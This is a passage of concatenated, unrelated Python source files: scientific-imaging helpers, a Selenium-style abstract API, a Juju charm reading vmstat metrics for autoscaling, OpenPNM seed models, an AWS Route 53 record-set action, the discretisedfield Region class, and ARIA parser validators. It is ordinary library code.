stretched[: new_dims[1], : new_dims[0]] = projs[2].T[:, ::-1]
stretched[new_dims[1] :, new_dims[0] :] = projs[1]
stretched[: new_dims[1], new_dims[0] :] = projs[0]
else:
raise ValueError("Arrangement must be [0, 1, 2] or [2, 0, 1]")
return stretched
def apply_cmap(data, cmap="gray", clim="auto", bytes=False):
"""
Apply a matplotlib colormap to a 2D or 3D numpy array and return the rgba data in float or uint8 format.
data : 2D or 3D numpy array
cmap : string denoting a matplotlib colormap
Colormap used for displaying frames from data. Defaults to 'gray'.
clim : length-2 list, tuple, or ndarray, or string
Upper and lower intensity limits to display from data. Defaults to 'auto'
If clim='auto', the min and max of data will be used as the clim.
Before applying the colormap, data will be clipped from clim[0] to clim[1].
bytes : bool, defaults to False
If true, return values are uint8 in the range 0-255. If false, return values are float in the range 0-1
"""
from matplotlib.colors import Normalize
from matplotlib.cm import ScalarMappable
from numpy import array
if clim == "auto":
clim = data.min(), data.max()
sm = ScalarMappable(Normalize(*clim, clip=True), cmap)
rgba = array([sm.to_rgba(d, bytes=bytes) for d in data])
return rgba
def depth_project(data, axis=0, cmap="jet", clim="auto", mode="sum"):
"""
Generate an RGB "depth projection" of a 3D numpy array.
Input data are normalized to [0,1] and data values along the projection axis are mapped
to indices in a linear RGBA colormap.
If `mode` is `sum`, for each element along the projection axis there is a color, and the brightness of this color is
scaled by the intensity values of the data. The output is the sum of the values along the projection axis,
i.e. a 3D array with the last dimension containing RGB values.
If 'mode' is 'max', then the intensity values are determined by the maximum intensity projection of data over the
projection axis, and the color of each pixel in the maximum projection is specified by the index where the maximum
value was attained. In the case of repeated maxmimal values, the index of the first is used.
data : 3D numpy array
axis : int denoting an axis to project over
cmap : string denoting a matplotlib colormap
clim : string, or list or tuple with length 2.
This argument determines the minimum and maximum intensity values to use before rescaling the data to the range
[0,1]. The default value, 'auto', specifies that the minimum and maximum values of the input data will be mapped
to [0,1].
mode : string determining which projection mode to use
"""
from numpy import linspace, zeros, array, argmax, all
from skimage.exposure import rescale_intensity as rescale
from matplotlib.cm import get_cmap
if clim == "auto":
clim = data.min(), data.max()
cm = get_cmap(cmap)(linspace(0, 1, data.shape[axis]))
data_r = rescale(data.astype("float32"), in_range=clim, out_range=(0, 1))
if mode == "sum":
cvol = zeros((*data.shape, 4))
data_r = array([data_r] * cm.shape[-1]).transpose(1, 2, 3, 0)
for ind in range(cvol.shape[axis]):
slices = [slice(None)] * cvol.ndim
slices[axis] = ind
slices = tuple(slices)
cvol[slices] = cm[ind] * data_r[slices]
proj = cvol.sum(axis)
proj[:, :, -1] = 1
proj[:, :, :-1] = rescale(
proj[:, :, :-1], in_range=(0, proj.max()), out_range=(0, 1)
)
elif mode == "max":
mx = data_r.max(axis)
dp = argmax(data_r, axis)
proj = (cm[dp, :].T * mx.T).T
else:
raise ValueError('Mode must be "sum" or "max"')
return proj
def nparray_to_video(
fname,
data,
clim="auto",
cmap="gray",
codec="h264",
fps=24,
ffmpeg_params=["-pix_fmt", "yuv420p"],
):
"""
Save 3D (t, y, x) numpy array to disk as movie. Uses matplotlib colormaps for rescaling / coloring data,
and uses moviepy.editor.ImageSequenceClip for movie creation.
Warning : this function duplicates the input data in memory.
fname : string
Filename with extension (.avi, .mp4, etc).
data : 3D numpy array
Each 2D array along the first axis of data will be a frame in the movie.
clim : length-2 list, tuple, or ndarray, or string
Upper and lower intensity limits to display from data. Defaults to 'auto'
If clim='auto', the min and max of data will be used as the clim.
Before applying the colormap, data will be clipped from clim[0] to clim[1].
cmap : string denoting a matplotlib colormap
Colormap used for displaying frames from data. Defaults to 'gray'.
codec : string
Which video codec to use. Defaults to 'h264'. See moviepy.editor.ImageSequenceClip.writevideofile.
fps : int or float
Frames per second of the movie. Defaults to 24.
ffmpeg_params : list of strings
Arguments sent to ffmpeg during movie creation. Defaults to ['-pix_fmt', 'yuv420p'], which is necessary for
creating movies that OSX understands.
"""
from numpy import pad
from moviepy.editor import ImageSequenceClip
# ffmpeg errors if the dimensions of each frame are not divisible by 2
if data.shape[1] % 2 == 1:
data = pad(data, ((0, 0), (0, 1), (0, 0)), mode="minimum")
if data.shape[2] % 2 == 1:
data = pad(data, ((0, 0), (0, 0), (0, 1)), mode="minimum")
data_rgba = apply_cmap(data, cmap=cmap, clim=clim)
clip = ImageSequenceClip([d for d in data_rgba], fps=fps)
clip.write_videofile(
fname,
audio=False,
codec=codec,
fps=fps,
ffmpeg_params=ffmpeg_params,
bitrate="50000k",
)
class RoiDrawing(object):
"""
Class for drawing ROI on matplotlib figures
"""
def __init__(self, ax, image_data):
self.image_axes = ax
self._focus_index = -1
self.image_data = image_data
self.lines = []
self.rois = []
self.cid_press = self.image_axes.figure.canvas.mpl_connect(
"button_press_event", self.onpress
)
self.cid_release = self.image_axes.figure.canvas.mpl_connect(
"button_press_event", self.onpress
)
self.masks = []
self.selector = []
@property
def focus_index(self):
return self._focus_index
@focus_index.setter
def focus_index(self, value):
if value < 0:
value = 0
if value > (len(self.rois) - 1):
self.new_roi()
self._focus_index = value
def focus_incr(self, event=None):
self.focus_index += 1
def focus_decr(self, event=None):
self.focus_index -= 1
def new_roi(self, event=None):
self.lines.append(self.image_axes.plot([0], [0])[0])
self.rois.append(ROI(image=self.image_data, x=[], y=[]))
self.masks.append(None)
def onpress(self, event):
"""
Callback function for connection to the event manager.
"""
from matplotlib.widgets import Lasso
if event.inaxes != self.image_axes:
return
if self.image_axes.figure.canvas.widgetlock.locked():
return
self.focus_incr()
self.selector = Lasso(
event.inaxes, (event.xdata, event.ydata), self.update_line_from_verts
)
self.image_axes.figure.canvas.widgetlock(self.selector)
def update_line_from_verts(self, verts):
current_line = self.lines[self.focus_index]
current_roi = self.rois[self.focus_index]
for x, y in verts:
current_roi.x.append(x)
current_roi.y.append(y)
self.image_axes.figure.canvas.widgetlock.release(self.selector)
current_line.set_data(current_roi.x, current_roi.y)
current_line.figure.canvas.draw()
def wipe(self, event):
current_line = self.lines[self.focus_index]
current_roi = self.rois[self.focus_index]
current_roi.reset()
current_line.set_data(current_roi.x, current_roi.y)
current_line.figure.canvas.draw()
def draw_rois(self, axes):
for roi in self.rois:
axes.plot(roi.x, roi.y)
def get_masks(self):
self.masks = [roi.get_mask() for roi in self.rois]
def set_rois(self, list_of_rois):
self.rois = [ROI(image=self.image_data, x=roi.x, y=roi.y) for roi in tqdm(list_of_rois)]
|
from abc import abstractmethod, ABC
from base64 import b64decode
from pymobiledevice3.services.web_protocol.automation_session import By
class SeleniumApi(ABC):
@abstractmethod
def find_element(self, by=By.ID, value=None):
pass
@abstractmethod
def find_elements(self, by=By.ID, value=None):
pass
@property
@abstractmethod
def screenshot_as_base64(self):
pass
def find_element_by_class_name(self, name):
return self.find_element(By.CLASS_NAME, name)
def find_element_by_css_selector(self, css_selector):
return self.find_element(By.CSS_SELECTOR, css_selector)
def find_element_by_id(self, id_):
return self.find_element(value=id_)
def find_element_by_link_text(self, link_text):
return self.find_element(By.LINK_TEXT, link_text)
def find_element_by_name(self, name):
return self.find_element(By.NAME, name)
def find_element_by_partial_link_text(self, link_text):
return self.find_element(By.PARTIAL_LINK_TEXT, link_text)
def find_element_by_tag_name(self, name):
return self.find_element(By.TAG_NAME, name)
def find_element_by_xpath(self, xpath):
return self.find_element(By.XPATH, xpath)
def find_elements_by_class_name(self, name):
return self.find_elements(By.CLASS_NAME, name)
def find_elements_by_css_selector(self, css_selector):
return self.find_elements(By.CSS_SELECTOR, css_selector)
def find_elements_by_id(self, id_):
return self.find_elements(value=id_)
def find_elements_by_link_text(self, link_text):
return self.find_elements(By.LINK_TEXT, link_text)
def find_elements_by_name(self, name):
return self.find_elements(By.NAME, name)
def find_elements_by_partial_link_text(self, link_text):
return self.find_elements(By.PARTIAL_LINK_TEXT, link_text)
def find_elements_by_tag_name(self, name):
return self.find_elements(By.TAG_NAME, name)
def find_elements_by_xpath(self, xpath):
return self.find_elements(By.XPATH, xpath)
def screenshot(self, filename):
png = self.screenshot_as_png()
try:
with open(filename, 'wb') as f:
f.write(png)
except IOError:
return False
return True
def screenshot_as_png(self):
return b64decode(self.screenshot_as_base64.encode('ascii'))
def get_screenshot_as_base64(self):
return self.screenshot_as_base64
def get_screenshot_as_file(self, filename):
return self.screenshot(filename)
def get_screenshot_as_png(self):
return self.screenshot_as_png()
def save_screenshot(self, filename) -> bool:
return self.screenshot(filename)
|
import sys
sys.path.append('lib')
import charms
from charmhelpers.core.hookenv import (
config,
log)
from charms.reactive import set_state, clear_flag
def get_vnf_metrics():
# Get VNF Metrics
metrics = dict()
try:
cmd = ['vmstat', '--one-header', '--active',
'1', # interval
'2', # count
]
result, err = charms.sshproxy._run(cmd, keep_alive=True)
log("Err: " + err)
lines = result.split('\n')
for line in lines:
log("LINE: " + line)
if len(lines) >= 3:
cols = lines[1].split()
vals = lines[3].split()
for col, val in zip(cols, vals):
if col == 'us': col = 'cpu_user'
if col == 'sy': col = 'cpu_system'
if col == 'id': col = 'cpu_idle'
if col == 'wa': col = 'cpu_waiting'
if col == 'st': col = 'cpu_stolen'
if col == 'free': col = 'mem_free'
if col == 'buff': col = 'mem_buffers'
if col == 'cache': col = 'mem_cached'
if col == 'inact': col = 'mem_inactive'
if col == 'active': col = 'mem_active'
log('METRIC: %s=%s' % (col, val))
metrics[col] = val
except Exception as e:
log('Metrics Evaluation failed:' + str(e), level='ERROR')
return metrics
def evaluate_vnt_metrics(metrics):
log('evaluate_vnt_metrics')
log(metrics)
try:
cpu_used = 100 - int(metrics['cpu_idle'])
log('cpu_used: %d' % cpu_used)
cfg = config()
log('scaleout_cpu_treshold: %d' % cfg['scaleout_cpu_treshold'])
log('scalein_cpu_treshold: %d' % cfg['scalein_cpu_treshold'])
if cpu_used > int(cfg['scaleout_cpu_treshold']):
set_state('scaling.out')
clear_flag('scaling.in')
elif cpu_used < int(cfg['scalein_cpu_treshold']):
clear_flag('scaling.out')
set_state('scaling.in')
else:
clear_flag('scaling.out')
clear_flag('scaling.in')
except Exception as e:
log('Metrics Evaluation failed:' + str(e), level='ERROR')
log('Metrics Evaluation failed:' + sys.exc_info(), level='WARN')
|
r"""
===============================================================================
Submodule -- throat_seeds
===============================================================================
"""
import scipy as _sp
def random(geometry, seed=None, num_range=[0, 1], **kwargs):
r"""
Assign random number to throats, for use in statistical distributions that
return pore size
Parameters
----------
seed : int
The starting seed value to send to Scipy's random number generator.
The default is None, which means different distribution is returned
each time the model is run.
num_range : list
A two element list indicating the low and high end of the returned
numbers.
"""
range_size = num_range[1] - num_range[0]
range_min = num_range[0]
_sp.random.seed(seed)
value = _sp.random.rand(geometry.num_throats(),)
value = value*range_size + range_min
return value
def neighbor(geometry, network, pore_prop='pore.seed', mode='min', **kwargs):
r"""
Adopt a value based on the values in the neighboring pores
Parameters
----------
mode : string
Indicates how to select the values from the neighboring pores. The
options are:
- min : (Default) Uses the minimum of the value found in the neighbors
- max : Uses the maximum of the values found in the neighbors
- mean : Uses an average of the neighbor values
pore_prop : string
The dictionary key containing the pore property to be used.
"""
throats = network.throats(geometry.name)
P12 = network.find_connected_pores(throats)
pvalues = network[pore_prop][P12]
if mode == 'min':
value = _sp.amin(pvalues, axis=1)
if mode == 'max':
value = _sp.amax(pvalues, axis=1)
if mode == 'mean':
value = _sp.mean(pvalues, axis=1)
return value
|
import os
import sys
import json
import boto3
from distutils import util
class AWSRoute53RecordSet:
"""
Primary class for the handling of AWS Route 53 Record Sets.
"""
def __init__(self):
"""
The default constructor.
"""
self.client = None
self.waiter = None
self.rr_skeleton = dict()
def _get_env(self, variable, exit=True):
"""
Try to fetch a variable from the environment.
Per default the method will raise an exception if the variable isn't present.
This behaviour can be switched off via the exit flag.
"""
value = os.environ.get(variable)
if not value and exit:
raise NameError("Cannot find environment variable: " + str(variable))
return value
def _connect(self):
"""
Creates a new client object which wraps the connection to AWS.
"""
if not self.client:
boto3.set_stream_logger('botocore', level='DEBUG')
self.client = boto3.client(
"route53"
)
self.waiter = self.client.get_waiter("resource_record_sets_changed")
def _set_comment(self):
"""
Appends an additional comment field to the record set.
"""
comment = self._get_env("INPUT_AWS_ROUTE53_RR_COMMENT", False)
if comment:
self.rr_skeleton["Comment"] = comment
def _set_base_changes(self):
"""
Creates the base skeleton required for creating a new record set.
"""
self.rr_skeleton["Changes"] = [{
"Action": self._get_env("INPUT_AWS_ROUTE53_RR_ACTION"),
"ResourceRecordSet": {
"Name": self._get_env("INPUT_AWS_ROUTE53_RR_NAME"),
"Type": self._get_env("INPUT_AWS_ROUTE53_RR_TYPE"),
"TTL": int(self._get_env("INPUT_AWS_ROUTE53_RR_TTL", exit=False)) or 300,
"ResourceRecords": [{
"Value": self._get_env("INPUT_AWS_ROUTE53_RR_VALUE")
}]
}
}]
def _build_record_set(self):
"""
Builds up the skeleton used for modulating the record set.
"""
self._set_comment()
self._set_base_changes()
return self.rr_skeleton
def _change_record_set(self, record_set):
"""
Requests the required change at AWS.
"""
return self.client.change_resource_record_sets(
HostedZoneId=self._get_env("INPUT_AWS_ROUTE53_HOSTED_ZONE_ID"),
ChangeBatch=record_set
)
def _wait(self, request_id):
"""
Waits until the requested operations is finished.
"""
wait = self._get_env("INPUT_AWS_ROUTE53_WAIT", False)
if wait and util.strtobool(wait):
self.waiter.wait(
Id=request_id,
WaiterConfig={
"Delay": 10,
"MaxAttempts": 50
}
)
def _obtain_request_id(self, result):
"""
Grabs and returns the id of the given request.
"""
return result["ChangeInfo"]["Id"]
def _obtain_marshalled_result(self, result):
"""
Grabs and returns the HTTP response of the given request.
"""
return json.dumps(result["ResponseMetadata"], indent=4)
def change(self):
"""
Entrypoint for the management of a record set.
"""
self._connect()
record_set = self._build_record_set()
result = self._change_record_set(record_set)
self._wait(
self._obtain_request_id(result)
)
sys.stdout.write(
self._obtain_marshalled_result(result) + "\n"
)
try:
o = AWSRoute53RecordSet()
o.change()
except Exception as e:
sys.stderr.write(str(e) + "\n")
sys.exit(1)
|
import k3d
import random
import numpy as np
import matplotlib.pyplot as plt
import ubermagutil.units as uu
import ubermagutil.typesystem as ts
import discretisedfield.util as dfu
@ts.typesystem(p1=ts.Vector(size=3, const=True),
p2=ts.Vector(size=3, const=True))
class Region:
"""A cuboid region.
A cuboid region spans between two corner points :math:`\\mathbf{p}_{1}` and
:math:`\\mathbf{p}_{2}`. Points ``p1`` and ``p2`` can be any two diagonally
opposite points. If any of the edge lengths of the cuboid region is zero,
``ValueError`` is raised.
Parameters
----------
p1 / p2 : (3,) array_like
Diagonnaly opposite corner points :math:`\\mathbf{p}_{i} = (p_{x},
p_{y}, p_{z})`.
Raises
------
ValueError
If any region's edge length is zero.
Examples
--------
1. Defining a nano-sized region.
>>> import discretisedfield as df
...
>>> p1 = (-50e-9, -25e-9, 0)
>>> p2 = (50e-9, 25e-9, 5e-9)
>>> region = df.Region(p1=p1, p2=p2)
>>> region
Region(...)
2. An attempt to define a region, where one of the edge lengths is zero.
>>> # The edge length in the z-direction is zero.
>>> p1 = (-25, 3, 1)
>>> p2 = (25, 6, 1)
>>> region = df.Region(p1=p1, p2=p2)
Traceback (most recent call last):
...
ValueError: ...
"""
def __init__(self, p1, p2):
self.p1 = tuple(p1)
self.p2 = tuple(p2)
if np.equal(self.edges, 0).any():
msg = f'One of the region edge lengths is zero: {self.edges=}.'
raise ValueError(msg)
@property
def pmin(self):
"""Point with minimum coordinates in the region.
The :math:`i`-th component of :math:`\\mathbf{p}_\\text{min}` is
computed from points :math:`p_{1}` and :math:`p_{2}` between which the
cuboid region spans: :math:`p_\\text{min}^{i} = \\text{min}(p_{1}^{i},
p_{2}^{i})`.
Returns
-------
tuple (3,)
Point with minimum coordinates :math:`(p_{x}^\\text{min},
p_{y}^\\text{min}, p_{z}^\\text{min})`.
Examples
--------
1. Getting the minimum coordinate point.
>>> import discretisedfield as df
...
>>> p1 = (-1.1, 2.9, 0)
>>> p2 = (5, 0, -0.1)
>>> region = df.Region(p1=p1, p2=p2)
>>> region.pmin
(-1.1, 0.0, -0.1)
.. seealso:: :py:func:`~discretisedfield.Region.pmax`
"""
return dfu.array2tuple(np.minimum(self.p1, self.p2))
@property
def pmax(self):
"""Point with maximum coordinates in the region.
The :math:`i`-th component of :math:`\\mathbf{p}_\\text{max}` is
computed from points :math:`p_{1}` and :math:`p_{2}` between which the
cuboid region spans: :math:`p_\\text{max}^{i} = \\text{max}(p_{1}^{i},
p_{2}^{i})`.
Returns
-------
tuple (3,)
Point with maximum coordinates :math:`(p_{x}^\\text{max},
p_{y}^\\text{max}, p_{z}^\\text{max})`.
Examples
--------
1. Getting the maximum coordinate point.
>>> import discretisedfield as df
...
>>> p1 = (-1.1, 2.9, 0)
>>> p2 = (5, 0, -0.1)
>>> region = df.Region(p1=p1, p2=p2)
>>> region.pmax
(5.0, 2.9, 0.0)
.. seealso:: :py:func:`~discretisedfield.Region.pmin`
"""
return dfu.array2tuple(np.maximum(self.p1, self.p2))
@property
def edges(self):
"""Edge lengths of the region.
Edge length is computed from the points between which the region spans
:math:`\\mathbf{p}_{1}` and :math:`\\mathbf{p}_{2}`:
.. math::
\\mathbf{l} = (|p_{2}^{x} - p_{1}^{x}|, |p_{2}^{y} - p_{1}^{y}|,
|p_{2}^{z} - p_{1}^{z}|).
Returns
-------
tuple (3,)
Edge lengths :math:`(l_{x}, l_{y}, l_{z})`.
Examples
--------
1. Getting edge lengths of the region.
>>> import discretisedfield as df
...
>>> p1 = (0, 0, -5)
>>> p2 = (5, 15, 15)
>>> region = df.Region(p1=p1, p2=p2)
>>> region.edges
(5, 15, 20)
"""
return dfu.array2tuple(np.abs(np.subtract(self.p1, self.p2)))
@property
def centre(self):
"""Centre point.
It is computed as the middle point between minimum and maximum point
coordinates:
.. math::
\\mathbf{p}_\\text{centre} = \\frac{1}{2} (\\mathbf{p}_\\text{min}
+ \\mathbf{p}_\\text{max}).
Returns
-------
tuple (3,)
Centre point :math:`(p_{c}^{x}, p_{c}^{y}, p_{c}^{z})`.
Examples
--------
1. Getting the centre point.
>>> import discretisedfield as df
...
>>> p1 = (0, 0, 0)
>>> p2 = (5, 15, 20)
>>> region = df.Region(p1=p1, p2=p2)
>>> region.centre
(2.5, 7.5, 10.0)
"""
return dfu.array2tuple(np.multiply(np.add(self.pmin, self.pmax), 0.5))
@property
def volume(self):
"""Region volume.
It is computed by multiplying edge lengths of the region:
.. math::
V = l_{x} l_{y} l_{z}.
Returns
-------
numbers.Real
Volume of the region.
Examples
--------
1. Computing the volume of the region.
>>> import discretisedfield as df
...
>>> p1 = (0, 0, 0)
>>> p2 = (5, 10, 2)
>>> region = df.Region(p1=p1, p2=p2)
>>> region.volume
100.0
"""
return float(np.prod(self.edges))
def random_point(self):
"""Generate a random point in the region.
The use of this function is mostly for writing tests. This method is
not a property and it is called as
``discretisedfield.Region.random_point()``.
Returns
-------
tuple (3,)
Random point coordinates :math:`\\mathbf{p}_\\text{r} =
(p_{x}^\\text{r}, p_{y}^\\text{r}, p_{z}^\\text{r})`.
Examples
--------
1. Generating a random point.
>>> import discretisedfield as df
...
>>> p1 = (0, 0, 0)
>>> p2 = (200e-9, 200e-9, 1e-9)
>>> region = df.Region(p1=p1, p2=p2)
>>> region.random_point()
(...)
.. note::
In this example, ellipsis is used instead of an exact tuple because
the result differs each time
``discretisedfield.Region.random_point`` method is called.
"""
res = np.add(self.pmin, np.multiply(np.random.random(3), self.edges))
return dfu.array2tuple(res)
def __repr__(self):
"""Representation string.
Returns
-------
str
Representation string.
Example
-------
1. Getting representation string.
>>> import discretisedfield as df
...
>>> p1 = (0, 0, 0)
>>> p2 = (2, 2, 1)
>>> region = df.Region(p1=p1, p2=p2)
>>> repr(region)
'Region(p1=(0, 0, 0), p2=(2, 2, 1))'
"""
return f'Region(p1={self.pmin}, p2={self.pmax})'
def __eq__(self, other):
"""Relational operator ``==``.
Two regions are considered to be equal if they have the same minimum
and maximum coordinate points: :math:`\\mathbf{p}^\\text{max}_{1} =
\\mathbf{p}^\\text{max}_{2}` and :math:`\\mathbf{p}^\\text{min}_{1} =
\\mathbf{p}^\\text{min}_{2}`.
Parameters
----------
other : discretisedfield.Region
Second operand.
Returns
-------
bool
``True`` if two regions are equal and ``False`` otherwise.
Examples
--------
1. Check if regions are equal.
>>> import discretisedfield as df
...
>>> region1 = df.Region(p1=(0, 0, 0), p2=(5, 5, 5))
>>> region2 = df.Region(p1=(0.0, 0, 0), p2=(5.0, 5, 5))
>>> region3 = df.Region(p1=(1, 1, 1), p2=(5, 5, 5))
>>> region1 == region2
True
>>> region1 != region2
False
>>> region1 == region3
False
>>> region1 != region3
True
"""
atol = 1e-15
rtol = 1e-5
if not isinstance(other, self.__class__):
return False
elif (np.allclose(self.pmin, other.pmin, atol=atol, rtol=rtol) and
np.allclose(self.pmax, other.pmax, atol=atol, rtol=rtol)):
return True
else:
return False
def __contains__(self, other):
"""Determine if a point or another region belong to the region.
Point is considered to be in the region if
.. math::
p^\\text{min}_{i} \\le p_{i} \\le p^\\text{max}_{i}, \\text{for}\\,
i = x, y, z.
Similarly, if the second operand is ``discretisedfield.Region`` object,
it is considered to be in the region if both its ``pmin`` and ``pmax``
belong to the region.
Parameters
----------
other : (3,) array_like or discretisedfield.Region
The point coordinate :math:`(p_{x}, p_{y}, p_{z})` or a region
object.
Returns
-------
bool
``True`` if ``other`` is inside the region and ``False`` otherwise.
Example
-------
1. Check if point is inside the region.
>>> import discretisedfield as df
...
>>> p1 = (0, 0, 0)
>>> p2 = (2, 2, 1)
>>> region = df.Region(p1=p1, p2=p2)
>>> (1, 1, 1) in region
True
>>> (1, 3, 1) in region
False
>>> # corner points are considered to be in the region
>>> p1 in region
True
>>> p2 in region
True
2. Check if another region belongs to the region.
>>> df.Region(p1=(0, 0, 0), p2=(1, 1, 1)) in region
True
>>> df.Region(p1=(0, 0, 0), p2=(2, 2, 2)) in region
False
>>> # Region is considered to be in itself
>>> region in region
True
"""
if isinstance(other, self.__class__):
return other.pmin in self and other.pmax in self
elif np.logical_or(np.less(other, self.pmin),
np.greater(other, self.pmax)).any():
return False
return True
def __or__(self, other):
"""Facing surface.
Parameters
----------
other : discretisedfield.Region
Second operand.
Returns
-------
tuple : (3,)
The first element is the axis facing surfaces are perpendicular to.
If we start moving along that axis (e.g. from minus infinity) the
first region we are going to enter is the region which is the
second element of the tuple. When we leave that region, we enter
the second region, which is the third element of the tuple.
Examples
--------
1. Find facing surfaces.
>>> import discretisedfield as df
...
>>> p11 = (0, 0, 0)
>>> p12 = (100e-9, 50e-9, 20e-9)
>>> region1 = df.Region(p1=p11, p2=p12)
...
>>> p21 = (0, 0, 20e-9)
>>> p22 = (100e-9, 50e-9, 30e-9)
>>> region2 = df.Region(p1=p21, p2=p22)
...
>>> res = region1 | region2
>>> res[0]
'z'
>>> res[1] == region1
True
>>> res[2] == region2
True
"""
if not isinstance(other, self.__class__):
msg = (f'Unsupported operand type(s) for |: '
f'{type(self)=} and {type(other)=}.')
raise TypeError(msg)
for i in range(3):
if self.pmin[i] >= other.pmax[i]:
return (dfu.raxesdict[i], other, self)
if other.pmin[i] >= self.pmax[i]:
return (dfu.raxesdict[i], self, other)
else:
msg = 'Cannot find facing surfaces'
raise ValueError(msg)
def mpl(self, *, ax=None, figsize=None, color=dfu.cp_hex[0],
multiplier=None, filename=None, **kwargs):
"""``matplotlib`` plot.
If ``ax`` is not passed, ``matplotlib.axes.Axes`` object is created
automatically and the size of a figure can be specified using
``figsize``. The colour of lines depicting the region can be specified
using ``color`` argument, which must be a valid ``matplotlib`` color.
The plot is saved in PDF-format if ``filename`` is passed.
It is often the case that the object size is either small (e.g. on a
nanoscale) or very large (e.g. in units of kilometers). Accordingly,
``multiplier`` can be passed as :math:`10^{n}`, where :math:`n` is a
multiple of 3 (..., -6, -3, 0, 3, 6,...). According to that value, the
axes will be scaled and appropriate units shown. For instance, if
``multiplier=1e-9`` is passed, all axes will be divided by
:math:`1\\,\\text{nm}` and :math:`\\text{nm}` units will be used as
axis labels. If ``multiplier`` is not passed, the best one is
calculated internally.
This method is based on ``matplotlib.pyplot.plot``, so any keyword
arguments accepted by it can be passed (for instance, ``linewidth``,
``linestyle``, etc.).
Parameters
----------
ax : matplotlib.axes.Axes, optional
Axes to which the plot is added. Defaults to ``None`` - axes are
created internally.
figsize : (2,) tuple, optional
The size of a created figure if ``ax`` is not passed. Defaults to
``None``.
color : int, str, tuple, optional
A valid ``matplotlib`` color for lines depicting the region.
Defaults to the default color palette.
multiplier : numbers.Real, optional
Axes multiplier. Defaults to ``None``.
filename : str, optional
If filename is passed, the plot is saved. Defaults to ``None``.
Examples
--------
1. Visualising the region using ``matplotlib``.
>>> import discretisedfield as df
...
>>> p1 = (-50e-9, -50e-9, 0)
>>> p2 = (50e-9, 50e-9, 10e-9)
>>> region = df.Region(p1=p1, p2=p2)
>>> region.mpl()
"""
if ax is None:
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111, projection='3d')
if multiplier is None:
multiplier = uu.si_max_multiplier(self.edges)
unit = f'({uu.rsi_prefixes[multiplier]}m)'
pmin = np.divide(self.pmin, multiplier)
pmax = np.divide(self.pmax, multiplier)
dfu.plot_box(ax=ax, pmin=pmin, pmax=pmax, color=color, **kwargs)
ax.set(xlabel=f'x {unit}', ylabel=f'y {unit}', zlabel=f'z {unit}')
# Overwrite default plotting parameters.
ax.set_facecolor('#ffffff') # white face color
ax.tick_params(axis='both', which='major', pad=0) # no pad for ticks
if filename is not None:
plt.savefig(filename, bbox_inches='tight', pad_inches=0)
def k3d(self, *, plot=None, color=dfu.cp_int[0], multiplier=None,
**kwargs):
"""``k3d`` plot.
If ``plot`` is not passed, ``k3d.Plot`` object is created
automatically. The colour of the region can be specified using
``color`` argument.
For details about ``multiplier``, please refer to
``discretisedfield.Region.mpl``.
This method is based on ``k3d.voxels``, so any keyword arguments
accepted by it can be passed (e.g. ``wireframe``).
Parameters
----------
plot : k3d.Plot, optional
Plot to which the plot is added. Defaults to ``None`` - plot is
created internally.
color : int, optional
Colour of the region. Defaults to the default color palette.
multiplier : numbers.Real, optional
Axes multiplier. Defaults to ``None``.
Examples
--------
1. Visualising the region using ``k3d``.
>>> import discretisedfield as df
...
>>> p1 = (-50e-9, -50e-9, 0)
>>> p2 = (50e-9, 50e-9, 10e-9)
>>> region = df.Region(p1=p1, p2=p2)
>>> region.k3d()
Plot(...)
"""
if plot is None:
plot = k3d.plot()
plot.display()
if multiplier is None:
multiplier = uu.si_max_multiplier(self.edges)
unit = f'({uu.rsi_prefixes[multiplier]}m)'
plot_array = np.ones((1, 1, 1)).astype(np.uint8) # avoid k3d warning
bounds = [i for sublist in
zip(np.divide(self.pmin, multiplier),
np.divide(self.pmax, multiplier))
for i in sublist]
plot += k3d.voxels(plot_array, color_map=color, bounds=bounds,
outlines=False, **kwargs)
plot.axes = [i + r'\,\text{{{}}}'.format(unit)
for i in dfu.axesdict.keys()]
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from types import FunctionType
from ...utils.formatting import safe_repr
from ...utils.type import full_type_name
from ..validation import Issue
from .null import NULL
def get_locator(*values):
"""
Gets the first available locator.
:rtype: :class:`aria.parser.reading.Locator`
"""
for v in values:
if hasattr(v, '_locator'):
locator = v._locator
if locator is not None:
return locator
return None
def parse_types_dict_names(types_dict_names):
"""
If the first element in the array is a function, extracts it out.
"""
convert = None
if isinstance(types_dict_names[0], FunctionType):
convert = types_dict_names[0]
types_dict_names = types_dict_names[1:]
return types_dict_names, convert
def validate_primitive(value, cls, coerce=False):
"""
Checks if the value is of the primitive type, optionally attempting to coerce it
if it is not.
:raises ValueError: if not a primitive type or if coercion failed.
"""
if (cls is not None) and (value is not None):
if (cls is unicode) or (cls is str): # These two types are interchangeable
valid = isinstance(value, basestring)
elif cls is int:
# In Python, a bool is an int
valid = isinstance(value, int) and not isinstance(value, bool)
else:
valid = isinstance(value, cls)
if not valid:
if coerce:
if value is NULL:
value = None
value = cls(value)
else:
raise ValueError(u'not a "{0}": {1}'.format(full_type_name(cls), safe_repr(value)))
return value
def validate_no_short_form(context, presentation):
"""
Makes sure that we can use short form definitions only if we allowed it.
"""
if not hasattr(presentation, 'SHORT_FORM_FIELD') and not isinstance(presentation._raw, dict):
context.validation.report(u'short form not allowed for field "{0}"'
.format(presentation._fullname),
locator=presentation._locator,
level=Issue.BETWEEN_FIELDS)
def validate_no_unknown_fields(context, presentation):
"""
Make sure that we can use unknown fields only if we allowed it.
"""
if not getattr(presentation, 'ALLOW_UNKNOWN_FIELDS', False) \
and not context.validation.allow_unknown_fields \
and isinstance(presentation._raw, dict) \
and hasattr(presentation, 'FIELDS'):
for k in presentation._raw:
if k not in presentation.FIELDS:
context.validation.report(u'field "{0}" is not supported in "{1}"'
.format(k, presentation._fullname),
locator=presentation._get_child_locator(k),
level=Issue.BETWEEN_FIELDS)
def validate_known_fields(context, presentation):
"""
Validates all known fields.
"""
if hasattr(presentation, '_iter_fields'):
for _, field in presentation._iter_fields():
field.validate(presentation, context)
def get_parent_presentation(context, presentation, *types_dict_names):
"""
Returns the parent presentation according to the ``derived_from`` field, or ``None`` if invalid.
Checks that we do not derive from ourselves and that we do not cause a circular hierarchy.
The arguments from the third onwards are used to locate a nested field under
